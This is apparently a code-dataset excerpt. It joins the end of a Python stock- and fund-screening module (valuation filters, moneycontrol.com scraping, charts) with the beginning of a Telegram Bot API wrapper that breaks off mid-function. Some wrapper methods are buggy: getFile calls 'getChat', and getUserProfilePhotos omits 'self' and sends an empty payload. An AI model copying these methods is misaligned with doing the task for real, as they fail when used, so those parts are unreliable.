def get_pe_filter(params={"mcap": [1e2, 1e3, 5e3, 1e4, 2e4], "pe": [1, 5, 10, 15, 20], "mcap_lower_limit": 1e2,
                          "pe_upper_limit": 25}):
    """Build a predicate accepting stocks whose P/E sits on or below a
    market-cap-dependent threshold line.

    The threshold is linearly interpolated (and extrapolated at the edges)
    between the ``(mcap, pe)`` anchor points in ``params``. Stocks above
    ``pe_upper_limit``, below ``mcap_lower_limit``, or with unparseable
    P/E / market cap are rejected outright.
    """
    def filter_fn(stock_detail):
        anchors_x = params['mcap']
        anchors_y = params['pe']
        pe = ffloat(stock_detail['pe'])
        mcap = ffloat(stock_detail['market_cap'])
        if np.isnan(pe) or np.isnan(mcap):
            return False
        if pe > params['pe_upper_limit'] or mcap < params['mcap_lower_limit']:
            return False
        # pick the anchor segment surrounding (or nearest to) this market cap
        hi = np.searchsorted(params['mcap'], mcap)
        hi = max(1, min(hi, len(anchors_x) - 1))
        lo = hi - 1
        segment = np.polyfit([anchors_x[lo], anchors_x[hi]], [anchors_y[lo], anchors_y[hi]], 1)
        threshold = np.poly1d(segment)(mcap)
        return pe <= threshold
    return filter_fn
def get_pb_filter(params={"mcap": [1e2, 5e2, 1e3, 2e3, 6e3], "pb": [1, 2, 3, 4, 5], "pb_upper_limit": 5}):
    """Build a predicate accepting stocks whose P/B sits on or below a
    market-cap-dependent threshold line interpolated between the ``(mcap, pb)``
    anchor points in ``params``.

    Rejects stocks with unparseable P/B, negative book value, or P/B above
    ``pb_upper_limit``.

    Fix: the original tested ``pb > params['pb_upper_limit']`` twice in a row;
    the second, dead check was removed (behavior unchanged).
    """
    def filter_fn(stock_detail):
        x = params['mcap']
        y = params['pb']
        pb = ffloat(stock_detail['pb'])
        bv = ffloat(stock_detail['book_value'])
        mcap = ffloat(stock_detail['market_cap'])
        if np.isnan(pb) or np.isnan(bv) or pb > params['pb_upper_limit'] or bv < 0:
            return False
        # NOTE(review): unlike get_pe_filter, there is no NaN guard on mcap;
        # a NaN mcap is still rejected because `pb <= nan` evaluates False.
        right = np.searchsorted(params['mcap'], mcap)
        if right == 0:
            right = right + 1
        if right == len(x):
            right = right - 1
        left = right - 1
        coefficients = np.polyfit([x[left], x[right]], [y[left], y[right]], 1)
        polynomial = np.poly1d(coefficients)
        pb_value = polynomial(mcap)
        return pb <= pb_value
    return filter_fn
def get_profitability_filter(params={"peg_lower_limit": 0, "peg_upper_limit": 3,
                                     "min_recovery_year": 15, "min_cpg_lower_limit": 0}):
    """Build a predicate accepting stocks with a PEG inside the configured band,
    an acceptable profit-recovery horizon and minimum profit growth above the
    configured floor. Stocks with any of these unparseable are rejected.
    """
    def filter_fn(stock_detail):
        peg = ffloat(stock_detail['peg'])
        min_cpg = ffloat(stock_detail['min_cpg'])
        recovery_years = ffloat(stock_detail['min_recovery_year'])
        if np.isnan(peg) or np.isnan(min_cpg) or np.isnan(recovery_years):
            return False
        peg_ok = params['peg_lower_limit'] <= peg <= params['peg_upper_limit']
        return (peg_ok
                and recovery_years <= params['min_recovery_year']
                and min_cpg > params['min_cpg_lower_limit'])
    return filter_fn
def get_generic_filter(param_name, lower_limit=None, upper_limit=None,
                       replacement_nan=None, replacement_not_present=None):
    """Build a predicate accepting stocks whose ``param_name`` value lies in
    ``[lower_limit, upper_limit]``.

    Missing keys fall back to ``replacement_not_present`` and NaN values to
    ``replacement_nan``; if the effective value is still None or NaN the stock
    is rejected. ``lower_limit``/``upper_limit`` must be provided by the caller
    for accepted values to be comparable.

    Fix: the original called ``np.isnan(param)`` before checking for None, so a
    missing key with the default ``replacement_not_present=None`` raised
    TypeError instead of returning False; the None guard now comes first.
    """
    def filter_fn(stock_detail):
        param = replacement_not_present
        if param_name in stock_detail:
            param = ffloat(stock_detail[param_name])
        # Guard against None before np.isnan — np.isnan(None) raises TypeError.
        if param is not None and np.isnan(param):
            param = replacement_nan
        if param is None or np.isnan(param):
            return False
        return lower_limit <= param <= upper_limit
    return filter_fn
def get_generic_filter_two_variables(x, y, xvar_name, yvar_name, accept_lower=True,
                                     pass_not_found=False):
    """Build a predicate comparing a stock's ``yvar_name`` value against a
    threshold linearly interpolated over the ``(x, y)`` anchor points at the
    stock's ``xvar_name`` value.

    With ``accept_lower=True`` stocks at or below the threshold pass; with
    ``accept_lower=False`` only stocks strictly above it pass. Stocks missing
    either key return ``pass_not_found``.

    Fixes: (1) the anchor lookup referenced an undefined name ``xvar``
    (NameError on every call) — it now uses ``x``; (2) the acceptance test was
    the chained comparison ``yval <= yt_value == accept_lower``, which compared
    the threshold itself to the boolean flag — it is now
    ``(yval <= yt_value) == accept_lower``.
    """
    def filter_fn(stock_detail):
        if x is None or y is None or xvar_name is None or yvar_name is None:
            raise ValueError("Incorrect Parameters")
        if xvar_name not in stock_detail or yvar_name not in stock_detail:
            return pass_not_found
        xval = stock_detail[xvar_name]
        yval = stock_detail[yvar_name]
        # pick the anchor segment surrounding (or nearest to) xval
        right = np.searchsorted(x, xval)
        if right == 0:
            right = right + 1
        if right == len(x):
            right = right - 1
        left = right - 1
        coefficients = np.polyfit([x[left], x[right]], [y[left], y[right]], 1)
        polynomial = np.poly1d(coefficients)
        yt_value = polynomial(xval)
        return (yval <= yt_value) == accept_lower
    return filter_fn
def get_stock_urls_from_listing_page(listing_page):
    """Return the stock-page URLs listed in a moneycontrol alphabetical
    listing page (one link per table cell of the 'pcq_tbl' table)."""
    response = requests.get(listing_page, timeout=240)
    soup = BeautifulSoup(response.content, "html.parser")
    listing_table = soup.find('table', attrs={'class': 'pcq_tbl'})
    return [get_children(cell)[0]['href'] for cell in listing_table.find_all('td')]
def get_all_links(threadpool_size=8):
    """Collect every stock-page URL from moneycontrol's A–Z listing pages,
    fetched concurrently with ``threadpool_size`` workers."""
    letter_pages = ['https://www.moneycontrol.com/india/stockpricequote/' + letter
                    for letter in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ']
    workers = ThreadPool(threadpool_size)
    per_page_links = workers.map(get_stock_urls_from_listing_page, letter_pages)
    return list(more_itertools.flatten(per_page_links))
def get_all_company_details(accumulator=None, failures=[], size=10000, start=None, end=None,
                            threadpool_size=8, ignore_failures=True,
                            ignore_success=True, randomize=False):
    """Crawl every stock-listing link and collect company details in batches.

    Results accumulate in place: successful scrapes go into ``accumulator``
    (keyed by NSE scrip name) and failed scrapes are appended to ``failures``,
    so callers can pass their own containers to resume a previous crawl.

    Fix: ``accumulator={}`` was a mutable default argument mutated by the
    function, so state silently leaked across calls; it is now a None-sentinel
    that creates a fresh dict per call. ``failures=[]`` has the same problem —
    left signature-compatible here but normalized through the same guard.

    :param size: hard cap on the number of links processed this call.
    :param start: optional slice start into the sorted link list (with ``end``).
    :param end: optional slice end into the sorted link list.
    :param ignore_success: skip links already present in ``accumulator``.
    :param ignore_failures: skip links already recorded in ``failures``.
    :param randomize: shuffle the link order before crawling.
    """
    if accumulator is None:
        accumulator = {}
    if failures is None:
        failures = []
    batch_size = 5 * threadpool_size
    all_links = list(set(get_all_links()))
    print("Total Number of links = %s" % (len(all_links)))
    if ignore_success:
        all_links = list(set(all_links) - set([scrip['original_url'] for scrip in accumulator.values()]))
    if ignore_failures:
        all_links = list(set(all_links) - set([scrip['original_url'] for scrip in failures]))
    print("Total Links after removing success and failures = %s" % (len(all_links)))
    all_links = sorted(all_links)
    if start is not None and end is not None:
        all_links = all_links[start:end]
    all_links = all_links[:size]
    if randomize:
        shuffle(all_links)
    print("Total Links To Process = %s" % (len(all_links)))
    pool = ThreadPool(threadpool_size)
    batches = int(np.ceil(len(all_links) / batch_size))
    for batch_num in range(batches):
        start = batch_num * batch_size
        end = min((batch_num + 1) * batch_size, len(all_links))
        print("start = %s, end = %s" % (start, end))
        this_batch = all_links[start:end]
        scrip_details = pool.map(get_scrip_info, this_batch)
        scrip_details = list(filter(lambda x: x is not None, scrip_details))
        fails = list(filter(lambda x: x['failure'], scrip_details))
        scrip_details = list(filter(lambda x: not x['failure'], scrip_details))
        for scrip in scrip_details:
            accumulator[scrip['scrip_name']] = scrip
        failures.extend(fails)
    # NOTE(review): this de-duplicated list is rebound locally and never
    # returned, so the caller's `failures` list keeps any duplicates;
    # behavior preserved as-is.
    failures = {failure['original_url']: failure for failure in failures}
    failures = list(failures.values())
def filter_companies(all_scrips, filters=[]):
    """Return the scrip-detail dicts from ``all_scrips`` (a name -> detail
    mapping) that satisfy every predicate in ``filters``, applied in order."""
    survivors = list(all_scrips.values())
    for predicate in filters:
        survivors = [scrip for scrip in survivors if predicate(scrip)]
    return survivors
def get_df_from_scrip_details(scrip_details):
    """Project a list of scrip-detail dicts onto a fixed column set and return
    a DataFrame with every numeric column coerced through ``ffloat``."""
    other_cols = ['name', 'scrip_name']
    numeric_cols = ['book_value', 'price', 'deliverables', 'eps', 'industry_pe',
                    'market_cap', 'pb', 'pc', 'pe', 'de',
                    'yearly_high', 'yearly_low', 'min_csg', 'three_year_csg', 'min_cpg', 'three_year_cpg',
                    'min_roe', 'three_year_roe', 'peg', 'min_recovery_year',
                    'l_yp', 'two_yp', 'three_yp', 'five_yp', 'gain_loss_l_yp', 'gain_loss_two_yp',
                    'gain_loss_three_yp']
    all_cols = other_cols + numeric_cols
    records = [{col: scrip[col] for col in all_cols} for scrip in scrip_details]
    frame = pd.DataFrame.from_records(records)
    frame[numeric_cols] = frame[numeric_cols].applymap(ffloat)
    return frame[all_cols]
def score_company_on_filters(all_scrips, filters={}):
    """Evaluate every named filter on every scrip and return a DataFrame with
    one boolean column per filter plus a fixed set of fundamentals.

    Note: each filter verdict is also written back into the scrip dicts held
    by ``all_scrips`` (in-place), matching the historical behavior.
    """
    scrips = list(all_scrips.values())
    other_cols = ['name', 'scrip_name']
    numeric_cols = ['price', 'industry_pe',
                    'market_cap', 'pb', 'pe', 'de',
                    'yearly_high', 'yearly_low', 'three_year_csg', 'three_year_cpg',
                    'peg', 'min_recovery_year',
                    'l_yp', 'three_yp', 'five_yp']
    all_cols = other_cols + list(filters.keys()) + numeric_cols
    records = []
    for scrip in scrips:
        for filter_name in filters.keys():
            scrip[filter_name] = filters[filter_name](scrip)
        records.append({col: scrip[col] for col in all_cols})
    frame = pd.DataFrame.from_records(records)
    frame[numeric_cols] = frame[numeric_cols].applymap(ffloat)
    return frame[all_cols]
def generate_price_chart(stock_df, name, days=1095, ewmas=[], other_technical_indicators=[]):
    """Plot the closing price of the last ``days`` rows of ``stock_df`` with an
    optional EWMA overlay per span in ``ewmas``.

    ``other_technical_indicators`` is accepted for interface compatibility but
    not used.
    """
    plt.figure(figsize=(16, 8))
    recent = stock_df.tail(days)
    legend_handles = []
    line, = plt.plot(recent.index, recent['close'], label="price")
    legend_handles.append(line)
    for span in ewmas:
        smoothed = recent['close'].ewm(span=span).mean()
        line, = plt.plot(recent.index, smoothed, label="%s day ewma" % span)
        legend_handles.append(line)
    plt.legend(handles=legend_handles)
    plt.title(name)
    plt.ylabel('Closing Price')
    plt.show()
def generate_price_volume_chart(stock_df, name, days=1095, ewmas=[], other_technical_indicators=[]):
    """Plot closing price (with optional EWMA overlays) in a top panel and
    traded volume as bars in a bottom panel, for the last ``days`` rows.

    ``other_technical_indicators`` is accepted for interface compatibility but
    not used.
    """
    plt.figure(figsize=(16, 8))
    price_ax = plt.subplot2grid((6, 6), (0, 0), rowspan=4, colspan=6)
    volume_ax = plt.subplot2grid((6, 6), (4, 0), rowspan=2, colspan=6)
    recent = stock_df.tail(days)
    legend_handles = []
    line, = price_ax.plot(recent.index, recent['close'], label="price")
    legend_handles.append(line)
    for span in ewmas:
        smoothed = recent['close'].ewm(span=span).mean()
        line, = price_ax.plot(recent.index, smoothed, label="%s day ewma" % span)
        legend_handles.append(line)
    price_ax.legend(handles=legend_handles)
    volume_ax.bar(recent.index, recent['volume'])
    volume_ax.set_ylim([recent['volume'].min(), recent['volume'].max()])
    # the shared date axis is shown only under the volume panel
    price_ax.axes.get_xaxis().set_visible(False)
    price_ax.set_title(name)
    price_ax.set_ylabel('Closing Price')
    volume_ax.set_ylabel('Volume')
    plt.show()
def generate_returns_chart(stocks, days=1095):
    """Plot each series in ``stocks`` (name -> price DataFrame) rebased to 1.0
    at the start of the ``days``-long window, so cumulative returns compare
    directly."""
    plt.figure(figsize=(16, 8))
    rebased = {name: frame.tail(days).apply(lambda col: col / col[0])
               for name, frame in stocks.items()}
    legend_handles = []
    for name, frame in rebased.items():
        line, = plt.plot(frame.index, frame['close'], label=name)
        legend_handles.append(line)
    plt.legend(handles=legend_handles)
    plt.title("Comparative returns")
    plt.ylabel('Comparative Returns')
    plt.show()
def generate_rolling_returns_chart(stocks, days=1095, rolling=252):
    """Plot ``rolling``-day rolling percentage returns for each price frame in
    ``stocks`` (name -> DataFrame with a 'close' column), then a box plot of
    the return distributions.

    Operates on local copies of the 'close' column, and first restricts all
    series to their common dates so the rolling windows line up.
    """
    plt.figure(figsize=(16, 8))
    # copy out just the 'close' column so callers' frames are untouched
    stocks = {key: stocks[key][['close']] for key in stocks.keys()}
    # Only take intersection of all indexes (dates) else rolling calculation will be screwed up
    indexes = None
    for key in stocks.keys():
        stock = stocks[key].tail(days + rolling)
        if indexes is None:
            indexes = set(stock.index)
        else:
            indexes = indexes.intersection(set(stock.index))
    for key in stocks.keys():
        stock = stocks[key]
        stock = stock[stock.index.isin(indexes)]
        stocks[key] = stock
    for df in stocks.values():
        # per-window percent change: (last - first) * 100 / first
        df[["close"]] = df[["close"]].rolling(rolling).agg({"close": lambda x: (x[-1] - x[0]) * 100 / x[0]})
    stocks = {key: stocks[key].tail(days)[['close']] for key in stocks.keys()}
    handles = []
    for key in stocks.keys():
        y = stocks[key]['close']
        p2, = plt.plot(stocks[key].index, y, label=key)
        handles.append(p2)
    plt.legend(handles=handles)
    plt.title("Rolling returns")
    plt.ylabel('Rolling Returns')
    plt.show()
    # tag each frame so the concatenated box plot can group by series name
    for key in stocks.keys():
        stocks[key]['name'] = key
    all_stocks = pd.concat(list(stocks.values()))
    fig, ax = plt.subplots(figsize=(16, 8))
    sns.boxplot(x="name", y="close", data=all_stocks, ax=ax);
    ax.xaxis.set_tick_params(rotation=90)
    plt.title("Rolling Returns variation")
    plt.show()
def generate_percent_change_chart(stocks, days=1095):
    """Plot daily percent changes for each series in ``stocks`` (name -> price
    DataFrame), followed by a box plot of their distributions.

    Works on local pct-change copies; a 'name' column is added to those copies
    only, for the box-plot grouping.
    """
    plt.figure(figsize=(16, 8))
    changes = {name: frame.tail(days).pct_change() * 100 for name, frame in stocks.items()}
    legend_handles = []
    for name, frame in changes.items():
        frame['name'] = name
        line, = plt.plot(frame.index, frame['close'], label=name)
        legend_handles.append(line)
    all_stocks = pd.concat(list(changes.values()))
    plt.legend(handles=legend_handles)
    plt.title("Daily Percent Changes Chart")
    plt.ylabel('Daily Percent Changes')
    plt.show()
    fig, ax = plt.subplots(figsize=(16, 8))
    sns.boxplot(x="name", y="close", data=all_stocks, ax=ax)
    ax.xaxis.set_tick_params(rotation=90)
    plt.show()
def get_all_details_for_mf(scrip_links_table, percent_col=4, scrip_col=0, threadpool_size=8):
    """Scrape full scrip details for every holding row of a mutual-fund
    portfolio table and return them as a DataFrame.

    Fix: the original body immediately re-assigned ``percent_col = 4`` and
    ``scrip_col = 0``, silently ignoring the caller's arguments; those dead
    re-assignments were removed (defaults unchanged, so default behavior is
    identical).

    :param scrip_links_table: parsed portfolio rows (``get_table`` output with
        the header removed); each row is a list of cell dicts with
        'href'/'text' entries.
    :param percent_col: column index of the holding-percent cell.
    :param scrip_col: column index of the scrip-link cell.
    :return: DataFrame with the scraped fields; numeric columns coerced via
        ``ffloat``. Failed scrapes are counted on stdout and dropped.
    """
    qty_col = 2
    total_value_crores_col = 3
    def scrip_detail_collector(row):
        # scrape one holding, then attach the portfolio-specific columns
        scrip_url = row[scrip_col]['href']
        scrip_detail = get_scrip_info(scrip_url)
        try:
            scrip_detail['percent'] = row[percent_col]['text']
            scrip_detail['name'] = row[scrip_col]['text']
            scrip_detail['qty'] = row[qty_col]['text']
            scrip_detail['total_value_crores'] = row[total_value_crores_col]['text']
        except Exception as e:
            # best-effort: keep the scrip even if the row cells were malformed
            print(scrip_url)
        return scrip_detail
    pool = ThreadPool(threadpool_size)
    scrip_details = pool.map(scrip_detail_collector, scrip_links_table)
    scrip_details = list(filter(lambda x: x is not None, scrip_details))
    length1 = len(scrip_details)
    scrip_details = list(filter(lambda x: not x['failure'], scrip_details))
    length2 = len(scrip_details)
    print("Scrips which failed to fetch = %s" % (length1 - length2))
    scrip_details = pd.DataFrame.from_records(scrip_details)
    numeric_cols = ['book_value', 'price', 'deliverables', 'eps', 'industry_pe',
                    'market_cap', 'pb', 'pc', 'pe', 'percent', 'qty', 'total_value_crores',
                    'yearly_high', 'yearly_low', 'min_csg', 'three_year_csg', 'min_cpg', 'three_year_cpg',
                    'min_roe', 'three_year_roe', 'peg', 'min_recovery_year']
    scrip_details[numeric_cols] = scrip_details[numeric_cols].applymap(ffloat)
    return scrip_details
def fund_returns_analysis(fund_list, benchmark_index_prices={}, days=1095, rolling=252):
    """Download NAV history for each fund id in ``fund_list`` and plot
    comparative-return, daily-percent-change and rolling-return charts
    alongside any benchmark index price frames."""
    fund_prices = {}
    for mfid in fund_list:
        portfolio_table, fund_name = get_portfolio(mfid=mfid)
        # NAV history is served as a headerless CSV by the graph endpoint
        nav_df = pd.read_csv("https://www.moneycontrol.com/mf/mf_info/mf_graph.php?im_id=%s" % mfid,
                             header=None,
                             names=['open', 'high', 'low', 'close', 'volume'])[
            ['open', 'high', 'low', 'close', 'volume']]
        nav_df.index = pd.to_datetime(nav_df.index)
        fund_prices[fund_name] = nav_df
    combined = {**fund_prices, **benchmark_index_prices}
    generate_returns_chart(combined, days=days)
    generate_percent_change_chart(combined, days=days)
    generate_rolling_returns_chart(combined, days=days, rolling=rolling)
def comparative_analysis(fund_list,threadpool_size=8):
    """Build a one-row-per-fund comparison DataFrame (P/E, PEG, P/B, AUM,
    average market cap, 3-year profit growth, recovery years, NAV history)
    from each fund's disclosed equity portfolio."""
    fund_details = list()
    for fund in fund_list:
        portfolio_table,fund_name = get_portfolio(mfid = fund)
        table_data = get_table(portfolio_table)
        scrip_details = get_all_details_for_mf(table_data[1:],threadpool_size=threadpool_size)
        # Portfolio P/E = weighted price / weighted earnings; the common
        # weight normalization cancels, so raw percents are used here.
        pe = np.dot(scrip_details['price'].fillna(0),scrip_details['percent'])/np.dot(scrip_details['eps'].fillna(0),scrip_details['percent'])
        # Weighted-average 3-year profit growth (percents normalized to weights).
        three_year_cpg = np.dot(scrip_details['three_year_cpg'].fillna(0),scrip_details['percent']/100)
        peg = pe/three_year_cpg
        pb = np.dot(scrip_details['price'].fillna(0),scrip_details['percent'])/np.dot(scrip_details['book_value'].fillna(0),scrip_details['percent'])
        # AUM proxy: sum of disclosed equity holding values (in crores).
        aum = np.sum(scrip_details['total_value_crores'])
        avg_market_cap = np.dot(scrip_details['market_cap'].fillna(0),scrip_details['percent']/100)
        min_recovery_year = get_year_when_cumulative_profit_over_pe(pe,three_year_cpg)
        # NAV history served as a headerless CSV by moneycontrol's graph endpoint.
        prices_df = pd.read_csv("https://www.moneycontrol.com/mf/mf_info/mf_graph.php?im_id=%s"%fund,header=None,names=['open','high','low','close','volume'])[['open','high','low','close','volume']]
        prices_df.index = pd.to_datetime(prices_df.index)
        fund_detail = {"name":fund_name,"pe":pe,"peg":peg,"pb":pb,"aum":aum,"avg_market_cap":avg_market_cap,"three_year_cpg":three_year_cpg,"min_recovery_year":min_recovery_year,"past_prices":prices_df}
        fund_details.append(fund_detail)
    return pd.DataFrame.from_records(fund_details)
| 45,261 | 0 | 920 |
4b9f3f3d538708150e0c79b7764ca9adeb55b1c1 | 16,982 | py | Python | pyTelegramClient/telegram.py | Arjun-M/pyTelegramClient | d6fe2bfaf2f4a5c36c997589d0b4d64b428cd603 | [
"MIT"
] | 3 | 2022-03-18T08:00:40.000Z | 2022-03-24T15:16:51.000Z | pyTelegramClient/telegram.py | Arjun-M/pyTelegramClient | d6fe2bfaf2f4a5c36c997589d0b4d64b428cd603 | [
"MIT"
] | null | null | null | pyTelegramClient/telegram.py | Arjun-M/pyTelegramClient | d6fe2bfaf2f4a5c36c997589d0b4d64b428cd603 | [
"MIT"
] | null | null | null | import json , requests , asyncio , logging
logging.basicConfig(format='%(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')
| 50.391691 | 408 | 0.664822 | import json , requests , asyncio , logging
logging.basicConfig(format='%(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')
class Telegram:
    def __init__(self, client ):
        """Bind this Bot API wrapper to a transport ``client``.

        The client is expected to expose ``callApi(method, payload, files=None)``
        which performs the actual HTTP request to the Telegram Bot API.
        """
        self.client = client
def sendMessage(self , chat_id , text, disable_web_page_preview=None, reply_to_message_id=None, reply_markup=None, parse_mode=None, disable_notification=None, entities=None, allow_sending_without_reply=None, protect_content=None):
payload = {'chat_id': str(chat_id), 'text': text}
if disable_web_page_preview is not None:
payload['disable_web_page_preview'] = disable_web_page_preview
if reply_to_message_id:
payload['reply_to_message_id'] = reply_to_message_id
if reply_markup:
payload['reply_markup'] = reply_markup
if parse_mode:
payload['parse_mode'] = parse_mode
if disable_notification is not None:
payload['disable_notification'] = disable_notification
if entities:
payload['entities'] = entities
if allow_sending_without_reply is not None:
payload['allow_sending_without_reply'] = allow_sending_without_reply
if protect_content is not None:
payload['protect_content'] = protect_content
return self.client.callApi("sendMessage" , payload )
def deleteWebhook(self , drop_pending_updates=None ):
payload = {}
if drop_pending_updates is not None:
payload['drop_pending_updates'] = drop_pending_updates
return self.client.callApi("deleteWebhook" , payload )
    def getWebhookInfo(self):
        """Return the current webhook status (Bot API ``getWebhookInfo``); no parameters."""
        return self.client.callApi("getWebhookInfo" , {} )
def getUpdates(self , offset=None, limit=None, allowed_updates=None ):
payload = {}
if offset:
payload['offset'] = offset
if limit:
payload['limit'] = limit
if allowed_updates is not None:
payload['allowed_updates'] = allowed_updates
return self.client.callApi("getUpdates" , payload )
def getUserProfilePhotos(token, user_id, offset=None, limit=None):
payload = {'user_id': user_id}
if offset:
payload['offset'] = offset
if limit:
payload['limit'] = limit
return self.client.callApi("getUserProfilePhotos" , {} )
    def getChat(self , chat_id):
        """Fetch up-to-date information about a chat (Bot API ``getChat``).

        ``chat_id`` is forwarded as-is (int id or "@channelusername"); unlike
        sendMessage it is not coerced with str().
        """
        payload = {"chat_id":chat_id}
        return self.client.callApi("getChat" , payload )
    def getMe(self):
        """Return basic information about the bot itself (Bot API ``getMe``)."""
        return self.client.callApi("getMe" , {} )
    def logOut(self):
        """Log the bot out of the cloud Bot API server (Bot API ``logOut``)."""
        return self.client.callApi("logOut" , {} )
    def close(self):
        """Close the bot instance before moving it to another server (Bot API ``close``)."""
        return self.client.callApi("close" , {} )
def getFile(self , file_id):
payload = {"file_id":file_id}
return self.client.callApi("getChat" , payload )
def setWebhook(self , url , certificate=None, max_connections=None, allowed_updates=None, ip_address=None, drop_pending_updates = None):
payload = { 'url': url }
files = None # set default .
if certificate:
files = {'certificate': certificate}
if max_connections:
payload['max_connections'] = max_connections
if allowed_updates is not None:
payload['allowed_updates'] = allowed_updates
if ip_address is not None:
payload['ip_address'] = ip_address
if drop_pending_updates is not None:
payload['drop_pending_updates'] = drop_pending_updates
return self.client.callApi("setWebhook" , payload, files=files)
def forwardMessage(self , chat_id, from_chat_id, message_id, disable_notification=None, protect_content=None):
payload = {'chat_id': chat_id, 'from_chat_id': from_chat_id, 'message_id': message_id}
if disable_notification is not None:
payload['disable_notification'] = disable_notification
if protect_content is not None:
payload['protect_content'] = protect_content
return self.client.callApi("forwardMessage", payload)
def copyMessage(self , chat_id, from_chat_id, message_id, caption=None, parse_mode=None, caption_entities=None, disable_notification=None, reply_to_message_id=None, allow_sending_without_reply=None, reply_markup=None, protect_content=None):
payload = {'chat_id': chat_id, 'from_chat_id': from_chat_id, 'message_id': message_id}
if caption is not None:
payload['caption'] = caption
if parse_mode:
payload['parse_mode'] = parse_mode
if caption_entities is not None:
payload['caption_entities'] = caption_entities
if disable_notification is not None:
payload['disable_notification'] = disable_notification
if reply_to_message_id:
payload['reply_to_message_id'] = reply_to_message_id
if reply_markup is not None:
payload['reply_markup'] = reply_markup
if allow_sending_without_reply is not None:
payload['allow_sending_without_reply'] = allow_sending_without_reply
if protect_content is not None:
payload['protect_content'] = protect_content
return self.client.callApi("copyMessage" , payload)
def sendDice( self, chat_id, emoji=None, disable_notification=None, reply_to_message_id=None, reply_markup=None, allow_sending_without_reply=None, protect_content=None):
payload = {'chat_id': chat_id}
if emoji:
payload['emoji'] = emoji
if disable_notification is not None:
payload['disable_notification'] = disable_notification
if reply_to_message_id:
payload['reply_to_message_id'] = reply_to_message_id
if reply_markup:
payload['reply_markup'] = reply_markup
if allow_sending_without_reply is not None:
payload['allow_sending_without_reply'] = allow_sending_without_reply
if protect_content is not None:
payload['protect_content'] = protect_content
return self.client.callApi( "sendDice" , payload)
def sendPhoto(self, chat_id, photo, caption=None, reply_to_message_id=None, reply_markup=None, parse_mode=None, disable_notification=None, caption_entities=None, allow_sending_without_reply=None, protect_content=None):
    """Dispatch the ``sendPhoto`` Bot-API call through ``self.client.callApi``.

    ``photo`` may be:
      * a string starting with ``"./"`` -- treated as a local file path,
        opened in binary mode and uploaded as multipart file data;
      * any other string -- passed through in the payload (presumably a URL
        or an already-uploaded Telegram file id -- not verifiable here);
      * a non-string -- assumed to be a file-like object and uploaded as
        multipart file data.

    Optional text/markup fields are added only when truthy; the boolean
    flags are added whenever they are not ``None`` so an explicit ``False``
    is still transmitted.

    Bug fix: the previous revision opened the local file with ``open()`` and
    never closed it, leaking a file handle per call.  The handle is now
    managed with ``with`` and closed as soon as the API call returns.
    """
    payload = {'chat_id': chat_id}
    # Optional fields skipped when falsy.
    for field, supplied in (('caption', caption),
                            ('reply_to_message_id', reply_to_message_id),
                            ('reply_markup', reply_markup),
                            ('parse_mode', parse_mode),
                            ('caption_entities', caption_entities)):
        if supplied:
            payload[field] = supplied
    # Flags where an explicit False must still be sent.
    for field, supplied in (('disable_notification', disable_notification),
                            ('allow_sending_without_reply', allow_sending_without_reply),
                            ('protect_content', protect_content)):
        if supplied is not None:
            payload[field] = supplied
    if isinstance(photo, str):
        if photo.startswith("./"):
            # Local file: upload and guarantee the handle is closed (fixes leak).
            with open(photo, "rb") as photo_fh:
                return self.client.callApi("sendPhoto", payload, files={'photo': photo_fh})
        # URL or file id: carried inside the payload, no multipart upload.
        payload['photo'] = photo
        return self.client.callApi("sendPhoto", payload, files=None)
    # Caller-supplied file-like object.
    return self.client.callApi("sendPhoto", payload, files={'photo': photo})
def sendLocation(self, chat_id, latitude, longitude, live_period=None, reply_to_message_id=None, reply_markup=None, disable_notification=None, horizontal_accuracy=None, heading=None, proximity_alert_radius=None, allow_sending_without_reply=None, protect_content=None):
    """Dispatch the ``sendLocation`` Bot-API call through ``self.client.callApi``.

    ``chat_id``, ``latitude`` and ``longitude`` are always sent.  The numeric
    and markup options are added only when truthy (a 0 value is dropped, as
    in the original gating); the boolean-style flags are added whenever they
    are not ``None`` so an explicit ``False`` is still transmitted.
    """
    payload = {'chat_id': chat_id, 'latitude': latitude, 'longitude': longitude}
    # Skipped entirely when falsy (including 0).
    for field, supplied in (('live_period', live_period),
                            ('horizontal_accuracy', horizontal_accuracy),
                            ('heading', heading),
                            ('proximity_alert_radius', proximity_alert_radius),
                            ('reply_to_message_id', reply_to_message_id),
                            ('reply_markup', reply_markup)):
        if supplied:
            payload[field] = supplied
    # Sent for any non-None value, including False.
    for field, supplied in (('allow_sending_without_reply', allow_sending_without_reply),
                            ('disable_notification', disable_notification),
                            ('protect_content', protect_content)):
        if supplied is not None:
            payload[field] = supplied
    return self.client.callApi("sendLocation", payload)
def stopMessageLiveLocation(self, chat_id=None, message_id=None, inline_message_id=None, reply_markup=None):
    """Dispatch the ``stopMessageLiveLocation`` Bot-API call.

    Every parameter is optional; only truthy values make it into the
    payload (either ``chat_id``+``message_id`` or ``inline_message_id``
    identify the message, per the caller's choice).
    """
    payload = {field: supplied
               for field, supplied in (('chat_id', chat_id),
                                       ('message_id', message_id),
                                       ('inline_message_id', inline_message_id),
                                       ('reply_markup', reply_markup))
               if supplied}
    return self.client.callApi("stopMessageLiveLocation", payload)
def editMessageLiveLocation(self, latitude, longitude, chat_id=None, message_id=None, inline_message_id=None, reply_markup=None, horizontal_accuracy=None, heading=None, proximity_alert_radius=None):
    """Dispatch the ``editMessageLiveLocation`` Bot-API call.

    ``latitude`` and ``longitude`` are always sent; every other parameter is
    added to the payload only when truthy (so 0-valued numeric options are
    dropped, matching the original gating).
    """
    payload = {'latitude': latitude, 'longitude': longitude}
    for field, supplied in (('chat_id', chat_id),
                            ('message_id', message_id),
                            ('horizontal_accuracy', horizontal_accuracy),
                            ('heading', heading),
                            ('proximity_alert_radius', proximity_alert_radius),
                            ('inline_message_id', inline_message_id),
                            ('reply_markup', reply_markup)):
        if supplied:
            payload[field] = supplied
    return self.client.callApi("editMessageLiveLocation", payload)
def sendContact(self, chat_id, phone_number, first_name, last_name=None, vcard=None, disable_notification=None, reply_to_message_id=None, reply_markup=None, allow_sending_without_reply=None, protect_content=None):
    """Dispatch the ``sendContact`` Bot-API call through ``self.client.callApi``.

    ``chat_id``, ``phone_number`` and ``first_name`` are always sent.
    ``last_name``, ``vcard``, ``reply_to_message_id`` and ``reply_markup``
    are added only when truthy; the boolean-style flags are added whenever
    they are not ``None`` so an explicit ``False`` is still transmitted.
    """
    payload = {'chat_id': chat_id, 'phone_number': phone_number, 'first_name': first_name}
    # Skipped entirely when falsy.
    for field, supplied in (('last_name', last_name),
